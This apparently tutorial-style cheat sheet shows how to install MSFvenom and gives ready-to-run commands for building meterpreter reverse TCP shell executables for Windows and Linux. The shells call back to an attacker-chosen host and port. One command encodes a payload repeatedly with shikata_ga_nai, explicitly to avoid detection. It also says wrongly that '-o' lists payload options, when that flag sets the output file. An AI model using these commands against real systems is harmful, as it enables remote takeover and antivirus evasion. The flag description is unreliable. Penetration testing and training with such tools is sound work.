How to Install MSFvenom

MSFvenom is part of the Metasploit Framework. Install Metasploit to get MSFvenom:

Installation

username@machine_name:~$ sudo apt install metasploit-framework

Useful Commands for MSFvenom

-p [payload]: Specify the payload to use
-f [format]: Specify the output format (e.g., exe, elf, raw)
-o [options]: List all available options for the selected payload
-e [encoder]: Specify the encoder to use
-i [iterations]: Specify the number of iterations for encoding
-b [badchars]: Specify bad characters to avoid
-a [architecture]: Specify the architecture (e.g., x86, x64)
-p linux/x86/meterpreter/reverse_tcp: Generate a reverse TCP payload for Linux x86
-l payloads: List available payloads
-l encoders: List available encoders
-l formats: List available formats

Examples of MSFvenom Commands

Create a Windows reverse TCP shell payload:

Windows Payload

username@machine_name:~$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=[YourIP] LPORT=[YourPort] -f exe > shell.exe

Create a Linux reverse TCP shell payload:

Linux Payload

username@machine_name:~$ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=[YourIP] LPORT=[YourPort] -f elf > shell.elf

Encode a payload to avoid detection:

Encode Payload

username@machine_name:~$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=[YourIP] LPORT=[YourPort] -e x86/shikata_ga_nai -i 10 -f exe > encoded_shell.exe

Generate a payload with specified bad characters:

Bad Characters

username@machine_name:~$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=[YourIP] LPORT=[YourPort] -b "\x00\x0a\x0d" -f exe > no_badchars_shell.exe

List available payloads:

List Payloads

username@machine_name:~$ msfvenom -l payloads

List available encoders:

List Encoders

username@machine_name:~$ msfvenom -l encoders